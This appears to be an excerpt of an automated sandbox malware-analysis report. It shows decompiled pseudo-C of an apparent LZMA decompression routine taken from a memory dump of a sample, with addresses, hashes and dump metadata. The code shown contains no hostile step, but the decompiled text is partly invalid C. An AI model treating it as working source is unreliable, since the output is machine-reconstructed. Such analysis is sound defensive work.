                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L60;
                                                          											} else {
                                                          												L65:
                                                          												goto L58;
                                                          											}
                                                          										case 0x10:
                                                          											L109:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												L165:
                                                          												 *(__ebp - 0x88) = 0x10;
                                                          												goto L170;
                                                          											}
                                                          											L110:
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t365 = __ebp - 0x70;
                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t365;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											goto L111;
                                                          										case 0x11:
                                                          											L69:
                                                          											__esi =  *(__ebp - 0x58);
                                                          											 *(__ebp - 0x84) = 0x12;
                                                          											goto L132;
                                                          										case 0x12:
                                                          											L128:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L131:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												 *(__ebp - 0x84) = 0x13;
                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                          												L132:
                                                          												 *(_t644 - 0x54) = _t642;
                                                          												goto L133;
                                                          											}
                                                          											L129:
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											__eflags = __eax;
                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          											goto L130;
                                                          										case 0x13:
                                                          											L141:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												L143:
                                                          												_t469 = __ebp - 0x58;
                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          												__eflags =  *_t469;
                                                          												 *(__ebp - 0x30) = 0x10;
                                                          												 *(__ebp - 0x40) = 8;
                                                          												L144:
                                                          												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                          												L145:
                                                          												 *(_t644 - 0x50) = 1;
                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                          												goto L149;
                                                          											}
                                                          											L142:
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											 *(__ebp - 0x30) = 8;
                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          											L130:
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											 *(__ebp - 0x40) = 3;
                                                          											goto L144;
                                                          										case 0x14:
                                                          											L156:
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          											__eax =  *(__ebp - 0x80);
                                                          											while(1) {
                                                          												L140:
                                                          												 *(_t644 - 0x88) = _t537;
                                                          												goto L1;
                                                          											}
                                                          										case 0x15:
                                                          											L91:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          											__al = __al & 0x000000fd;
                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          											goto L120;
                                                          										case 0x16:
                                                          											goto L0;
                                                          										case 0x17:
                                                          											while(1) {
                                                          												L145:
                                                          												 *(_t644 - 0x50) = 1;
                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                          												goto L149;
                                                          											}
                                                          										case 0x18:
                                                          											goto L146;
                                                          										case 0x19:
                                                          											L94:
                                                          											__eflags = __ebx - 4;
                                                          											if(__ebx < 4) {
                                                          												L98:
                                                          												 *(__ebp - 0x2c) = __ebx;
                                                          												L119:
                                                          												_t393 = __ebp - 0x2c;
                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          												__eflags =  *_t393;
                                                          												L120:
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													L166:
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          													goto L170;
                                                          												}
                                                          												L121:
                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                          													goto L171;
                                                          												}
                                                          												L122:
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          												__eax =  *(__ebp - 0x30);
                                                          												_t400 = __ebp - 0x60;
                                                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          												__eflags =  *_t400;
                                                          												goto L123;
                                                          											}
                                                          											L95:
                                                          											__ecx = __ebx;
                                                          											__eax = __ebx;
                                                          											__ecx = __ebx >> 1;
                                                          											__eax = __ebx & 0x00000001;
                                                          											__ecx = (__ebx >> 1) - 1;
                                                          											__al = __al | 0x00000002;
                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                          											__eflags = __ebx - 0xe;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__ebx >= 0xe) {
                                                          												L97:
                                                          												__ebx = 0;
                                                          												 *(__ebp - 0x48) = __ecx;
                                                          												L102:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													L107:
                                                          													__eax = __eax + __ebx;
                                                          													 *(__ebp - 0x40) = 4;
                                                          													 *(__ebp - 0x2c) = __eax;
                                                          													__eax =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                          													__eflags = __eax;
                                                          													L108:
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x58) = __eax;
                                                          													 *(__ebp - 0x50) = 1;
                                                          													 *(__ebp - 0x44) = 0;
                                                          													 *(__ebp - 0x48) = 0;
                                                          													L112:
                                                          													__eax =  *(__ebp - 0x40);
                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          														L118:
                                                          														_t391 = __ebp - 0x2c;
                                                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          														__eflags =  *_t391;
                                                          														goto L119;
                                                          													}
                                                          													L113:
                                                          													__eax =  *(__ebp - 0x50);
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__esi = __edi + __eax;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__ax =  *__esi;
                                                          													__ecx = __ax & 0x0000ffff;
                                                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          													__eflags =  *(__ebp - 0xc) - __edx;
                                                          													if( *(__ebp - 0xc) >= __edx) {
                                                          														__ecx = 0;
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          														__ecx = 1;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          														__ebx = 1;
                                                          														__ecx =  *(__ebp - 0x48);
                                                          														__ebx = 1 << __cl;
                                                          														__ecx = 1 << __cl;
                                                          														__ebx =  *(__ebp - 0x44);
                                                          														__ebx =  *(__ebp - 0x44) | __ecx;
                                                          														__cx = __ax;
                                                          														__cx = __ax >> 5;
                                                          														__eax = __eax - __ecx;
                                                          														__edi = __edi + 1;
                                                          														__eflags = __edi;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          														 *__esi = __ax;
                                                          														 *(__ebp - 0x50) = __edi;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __edx;
                                                          														0x800 = 0x800 - __ecx;
                                                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          														 *__esi = __dx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L111:
                                                          														_t368 = __ebp - 0x48;
                                                          														 *_t368 =  *(__ebp - 0x48) + 1;
                                                          														__eflags =  *_t368;
                                                          														goto L112;
                                                          													} else {
                                                          														L117:
                                                          														goto L109;
                                                          													}
                                                          												}
                                                          												L103:
                                                          												__ecx =  *(__ebp - 0xc);
                                                          												__ebx = __ebx + __ebx;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													__ebx = __ebx | 0x00000001;
                                                          													__eflags = __ebx;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													L101:
                                                          													_t338 = __ebp - 0x48;
                                                          													 *_t338 =  *(__ebp - 0x48) - 1;
                                                          													__eflags =  *_t338;
                                                          													goto L102;
                                                          												} else {
                                                          													L106:
                                                          													goto L99;
                                                          												}
                                                          											}
                                                          											L96:
                                                          											__edx =  *(__ebp - 4);
                                                          											__eax = __eax - __ebx;
                                                          											 *(__ebp - 0x40) = __ecx;
                                                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          											goto L108;
                                                          										case 0x1a:
                                                          											L56:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												L162:
                                                          												 *(__ebp - 0x88) = 0x1a;
                                                          												goto L170;
                                                          											}
                                                          											L57:
                                                          											__ecx =  *(__ebp - 0x68);
                                                          											__al =  *(__ebp - 0x5c);
                                                          											__edx =  *(__ebp - 8);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          											 *( *(__ebp - 0x68)) = __al;
                                                          											__ecx =  *(__ebp - 0x14);
                                                          											 *(__ecx +  *(__ebp - 8)) = __al;
                                                          											__eax = __ecx + 1;
                                                          											__edx = 0;
                                                          											_t192 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t192;
                                                          											goto L80;
                                                          										case 0x1b:
                                                          											L76:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												L163:
                                                          												 *(__ebp - 0x88) = 0x1b;
                                                          												goto L170;
                                                          											}
                                                          											L77:
                                                          											__eax =  *(__ebp - 0x14);
                                                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          											__eflags = __eax -  *(__ebp - 0x74);
                                                          											if(__eax >=  *(__ebp - 0x74)) {
                                                          												__eax = __eax +  *(__ebp - 0x74);
                                                          												__eflags = __eax;
                                                          											}
                                                          											__edx =  *(__ebp - 8);
                                                          											__cl =  *(__eax + __edx);
                                                          											__eax =  *(__ebp - 0x14);
                                                          											 *(__ebp - 0x5c) = __cl;
                                                          											 *(__eax + __edx) = __cl;
                                                          											__eax = __eax + 1;
                                                          											__edx = 0;
                                                          											_t275 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t275;
                                                          											__eax =  *(__ebp - 0x68);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											_t284 = __ebp - 0x64;
                                                          											 *_t284 =  *(__ebp - 0x64) - 1;
                                                          											__eflags =  *_t284;
                                                          											 *( *(__ebp - 0x68)) = __cl;
                                                          											L80:
                                                          											 *(__ebp - 0x14) = __edx;
                                                          											goto L81;
                                                          										case 0x1c:
                                                          											while(1) {
                                                          												L123:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													break;
                                                          												}
                                                          												L124:
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t414 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t414;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          												__eflags =  *(__ebp - 0x30);
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												 *(__ebp - 0x14) = _t414;
                                                          												if( *(__ebp - 0x30) > 0) {
                                                          													continue;
                                                          												} else {
                                                          													L127:
                                                          													L81:
                                                          													 *(__ebp - 0x88) = 2;
                                                          													goto L1;
                                                          												}
                                                          											}
                                                          											L167:
                                                          											 *(__ebp - 0x88) = 0x1c;
                                                          											goto L170;
                                                          									}
                                                          								}
                                                          								L171:
                                                          								_t539 = _t538 | 0xffffffff;
                                                          								goto L172;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}















                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fc2
                                                          0x00405fc2
                                                          0x00405fc6
                                                          0x00406872
                                                          0x00406872
                                                          0x00000000
                                                          0x00406872
                                                          0x00405fcc
                                                          0x00405fcf
                                                          0x00405fdf
                                                          0x00405fe2
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe8
                                                          0x00405fec
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fee
                                                          0x00405fee
                                                          0x00405ff4
                                                          0x0040601e
                                                          0x00406024
                                                          0x0040602b
                                                          0x00000000
                                                          0x0040602b
                                                          0x00405ff6
                                                          0x00405ffa
                                                          0x00405ffd
                                                          0x00406002
                                                          0x00406002
                                                          0x0040600d
                                                          0x00406015
                                                          0x00406018
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040605d
                                                          0x00406063
                                                          0x00406066
                                                          0x00406073
                                                          0x0040607b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406032
                                                          0x00406032
                                                          0x00406036
                                                          0x00406881
                                                          0x00406881
                                                          0x00000000
                                                          0x00406881
                                                          0x0040603c
                                                          0x00406042
                                                          0x0040604d
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406050
                                                          0x00406053
                                                          0x00406056
                                                          0x0040605b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f8
                                                          0x004066fe
                                                          0x00406704
                                                          0x0040671e
                                                          0x00406721
                                                          0x00406727
                                                          0x00406732
                                                          0x00406732
                                                          0x00406734
                                                          0x00406706
                                                          0x00406706
                                                          0x00406715
                                                          0x00406719
                                                          0x00406719
                                                          0x0040673e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406740
                                                          0x00406744
                                                          0x004068f3
                                                          0x004068f3
                                                          0x00000000
                                                          0x004068f3
                                                          0x0040674a
                                                          0x00406750
                                                          0x00406757
                                                          0x0040675f
                                                          0x00406762
                                                          0x00406765
                                                          0x00406765
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x00406083
                                                          0x00406085
                                                          0x00406088
                                                          0x004060f9
                                                          0x004060f9
                                                          0x004060fc
                                                          0x004060ff
                                                          0x00406106
                                                          0x00406110
                                                          0x00000000
                                                          0x00406110
                                                          0x0040608a
                                                          0x0040608a
                                                          0x0040608e
                                                          0x00406091
                                                          0x00406093
                                                          0x00406096
                                                          0x00406099
                                                          0x0040609b
                                                          0x0040609e
                                                          0x004060a0
                                                          0x004060a5
                                                          0x004060a8
                                                          0x004060ab
                                                          0x004060af
                                                          0x004060b6
                                                          0x004060b9
                                                          0x004060c0
                                                          0x004060c4
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060d0
                                                          0x004060d3
                                                          0x004060f1
                                                          0x004060f1
                                                          0x004060f3
                                                          0x00000000
                                                          0x004060d5
                                                          0x004060d5
                                                          0x004060d5
                                                          0x004060d8
                                                          0x004060db
                                                          0x004060de
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e3
                                                          0x004060e6
                                                          0x004060e8
                                                          0x004060e9
                                                          0x004060ec
                                                          0x00000000
                                                          0x004060ec
                                                          0x00000000
                                                          0x00406322
                                                          0x00406322
                                                          0x00406326
                                                          0x00406344
                                                          0x00406344
                                                          0x00406347
                                                          0x0040634e
                                                          0x00406351
                                                          0x00406354
                                                          0x00406357
                                                          0x0040635a
                                                          0x0040635d
                                                          0x0040635f
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x0040636c
                                                          0x0040636f
                                                          0x00406372
                                                          0x00406372
                                                          0x00406377
                                                          0x00000000
                                                          0x00406377
                                                          0x00406328
                                                          0x00406328
                                                          0x0040632b
                                                          0x0040632e
                                                          0x00406338
                                                          0x00000000
                                                          0x00000000
                                                          0x0040638c
                                                          0x0040638c
                                                          0x00406390
                                                          0x004063b3
                                                          0x004063b6
                                                          0x004063b9
                                                          0x004063c3
                                                          0x00406392
                                                          0x00406392
                                                          0x00406395
                                                          0x00406398
                                                          0x0040639b
                                                          0x004063a8
                                                          0x004063ab
                                                          0x004063ab
                                                          0x00000000
                                                          0x00000000
                                                          0x004063cf
                                                          0x004063cf
                                                          0x004063d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004063d9
                                                          0x004063d9
                                                          0x004063dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004063e3
                                                          0x004063e3
                                                          0x004063e5
                                                          0x004063e9
                                                          0x004063e9
                                                          0x004063ec
                                                          0x004063f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406440
                                                          0x00406440
                                                          0x00406444
                                                          0x0040644b
                                                          0x0040644b
                                                          0x0040644e
                                                          0x00406451
                                                          0x0040645b
                                                          0x00000000
                                                          0x0040645b
                                                          0x00406446
                                                          0x00406446
                                                          0x00000000
                                                          0x00000000
                                                          0x00406467
                                                          0x00406467
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406475
                                                          0x00406478
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040647b
                                                          0x0040647e
                                                          0x00406481
                                                          0x00406481
                                                          0x00406484
                                                          0x00406487
                                                          0x0040648a
                                                          0x0040648a
                                                          0x0040648d
                                                          0x00406494
                                                          0x00406499
                                                          0x00000000
                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
                                                          • Instruction ID: fb01dad5a0cc1219e3999a8d2bb186b1e56f72b4220c9c95c749fe4814af579a
                                                          • Opcode Fuzzy Hash: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
                                                          • Instruction Fuzzy Hash: 0CA15471D00229CBDF28CFA8C8447ADBBB1FB44305F15816AD856BB281D7785A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E004066B9() {
                                                          				void _t533;
                                                          				signed int _t534;
                                                          				signed int _t535;
                                                          				signed int* _t605;
                                                          				void* _t612;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t612 - 0x40) != 0) {
                                                          						 *(_t612 - 0x84) = 0x13;
                                                          						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                          						goto L132;
                                                          					} else {
                                                          						__eax =  *(__ebp - 0x4c);
                                                          						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          						__ecx =  *(__ebp - 0x58);
                                                          						__eax =  *(__ebp - 0x4c) << 4;
                                                          						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          						L130:
                                                          						 *(__ebp - 0x58) = __eax;
                                                          						 *(__ebp - 0x40) = 3;
                                                          						L144:
                                                          						 *(__ebp - 0x7c) = 0x14;
                                                          						L145:
                                                          						__eax =  *(__ebp - 0x40);
                                                          						 *(__ebp - 0x50) = 1;
                                                          						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          						L149:
                                                          						if( *(__ebp - 0x48) <= 0) {
                                                          							__ecx =  *(__ebp - 0x40);
                                                          							__ebx =  *(__ebp - 0x50);
                                                          							0 = 1;
                                                          							__eax = 1 << __cl;
                                                          							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          							__eax =  *(__ebp - 0x7c);
                                                          							 *(__ebp - 0x44) = __ebx;
                                                          							while(1) {
                                                          								L140:
                                                          								 *(_t612 - 0x88) = _t533;
                                                          								while(1) {
                                                          									L1:
                                                          									_t534 =  *(_t612 - 0x88);
                                                          									if(_t534 > 0x1c) {
                                                          										break;
                                                          									}
                                                          									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
                                                          										case 0:
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                          											_t534 =  *( *(_t612 - 0x70));
                                                          											if(_t534 > 0xe1) {
                                                          												goto L171;
                                                          											}
                                                          											_t538 = _t534 & 0x000000ff;
                                                          											_push(0x2d);
                                                          											asm("cdq");
                                                          											_pop(_t569);
                                                          											_push(9);
                                                          											_pop(_t570);
                                                          											_t608 = _t538 / _t569;
                                                          											_t540 = _t538 % _t569 & 0x000000ff;
                                                          											asm("cdq");
                                                          											_t603 = _t540 % _t570 & 0x000000ff;
                                                          											 *(_t612 - 0x3c) = _t603;
                                                          											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                          											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                          											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                          											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                          												L10:
                                                          												if(_t611 == 0) {
                                                          													L12:
                                                          													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                          													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                          													goto L15;
                                                          												} else {
                                                          													goto L11;
                                                          												}
                                                          												do {
                                                          													L11:
                                                          													_t611 = _t611 - 1;
                                                          													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                          												} while (_t611 != 0);
                                                          												goto L12;
                                                          											}
                                                          											if( *(_t612 - 4) != 0) {
                                                          												GlobalFree( *(_t612 - 4));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          											 *(_t612 - 4) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                          												goto L10;
                                                          											}
                                                          										case 1:
                                                          											L13:
                                                          											__eflags =  *(_t612 - 0x6c);
                                                          											if( *(_t612 - 0x6c) == 0) {
                                                          												 *(_t612 - 0x88) = 1;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                          											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                          											_t45 = _t612 - 0x48;
                                                          											 *_t45 =  *(_t612 - 0x48) + 1;
                                                          											__eflags =  *_t45;
                                                          											L15:
                                                          											if( *(_t612 - 0x48) < 4) {
                                                          												goto L13;
                                                          											}
                                                          											_t546 =  *(_t612 - 0x40);
                                                          											if(_t546 ==  *(_t612 - 0x74)) {
                                                          												L20:
                                                          												 *(_t612 - 0x48) = 5;
